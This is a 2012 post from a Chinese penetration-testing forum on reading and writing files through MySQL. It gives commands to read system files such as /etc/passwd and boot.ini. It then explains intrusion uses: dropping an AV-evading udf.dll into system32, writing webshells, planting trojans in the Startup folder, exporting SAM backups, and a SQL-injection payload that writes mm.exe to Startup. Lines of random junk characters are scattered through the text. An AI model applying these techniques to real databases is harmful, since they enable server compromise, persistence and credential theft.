中国网络渗透测试联盟
标题:
mysql下读取文件的几种方式
[打印本页]
作者:
admin
时间:
2012-9-13 16:34
标题:
mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
" n* X9 a! `3 f: V" [7 j4 n
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
! @& F6 ]& k! N! \ K: D- U* s& U
3 h) V7 Z y9 G. p) Y0 q
mysql3.x下
" x5 L2 b( k5 i1 `/ r; D6 R2 U
2 n" F8 Z* O; U6 A0 ~
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
6 s! e' f. Y7 _$ t% K: H" d* T
% v3 I2 b/ F+ e q+ w
mysql>create table a (cmd text);
% }$ `8 n0 [" s& {7 {( W/ k
mysql>load data infile 'c:\\boot.ini' into table a;
: e* |, @2 Q& {: M Z1 g
mysql>select * from a;
+ A5 l8 C* Z: Q% Q
7 R1 b5 y" ?9 {1 u, | y& j
mysql4.x下
# ]6 P% M: b- P0 j! U
; d, A/ R/ \8 R \+ `% l# j2 @
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
+ u( z: h! H. N, H4 ^
7 j9 B. O+ J0 \8 s, {3 t; r8 H& c
mysql>create table a (cmd text);
8 A. z c6 Q0 ~. R0 B) R8 c0 r
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
& [7 }) d' D( G0 q+ K4 O: ]& q
mysql>select * from a;
: t5 f! ^3 m" _
7 R r) F$ S1 k; O' {9 b
mysql5.x下
% Q5 |( Z6 e! N6 H
2 G; z0 n. a. Y) F/ l! C3 [
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
' _. m- i3 Q2 P+ D& E
" H8 R' ?2 j+ g6 K2 E9 C9 Q* N9 V
mysql>system cat /etc/passwd
) y9 r- a$ y/ t1 z
0 B" o5 u4 k. y9 X; V
' S4 m$ H& W7 Z6 \
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
' d+ y6 Z% V- b7 s+ w
8 q( ] F. W, m3 y p
' ?9 {2 V" h/ v2 w+ w9 @' [
例:把免杀过的udf.dll文件插入系统目录
# p0 c4 }$ u8 g( P; R8 i! Q" M4 e
6 q! R: Y! ?8 |( y" M" F2 ?
create table a (cmd LONGBLOB);
% m" S) R2 i% i& [
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
. [# X9 g3 r B4 v% g3 {7 ?
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
5 b, } d. N6 v' H* t' I1 T9 _
+ q& ]* \" x+ H# B% ?* J
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
" B. ]/ n" R) ]1 p4 _
{ W( D7 |/ b: T* W; L
# @( _! K4 d& S) D* Y/ `
注入中的语法(未测试)
& L+ O; I$ {" h
" r+ N; C6 J8 g
1 R' ^& U. y. G6 D) @3 y1 D, \9 h+ D
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2